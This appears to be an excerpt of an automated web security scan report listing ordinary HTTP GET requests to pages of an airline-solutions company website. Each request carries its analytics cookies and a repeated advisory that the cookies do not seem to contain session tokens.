GET /home/contact/airports HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/airports/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/media_relations HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/media_relations/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/product_sales HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/product_sales/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/product_support_and_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/product_support_and_services/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/sabre_holdings_corporation HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/sabre_holdings_corporation/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/includes/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/includes/form_adi HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/includes/form_demo HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322635; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/includes/form_issues?issue=fuel_management&iframe=true&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/includes/form_list?iframe=true&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/includes/form_suites HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2 Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321464; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321210; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/2009_sabresonic_loyalty_user_conference HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/operations_user_conference HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/operations_user_conference2 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/sabre_aircentre_operations_enterprise_solution_user_workshop HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322316; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fproduct%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/sabre_airmax_group_manager_user_conference HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/event/sabre_developers_conference HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
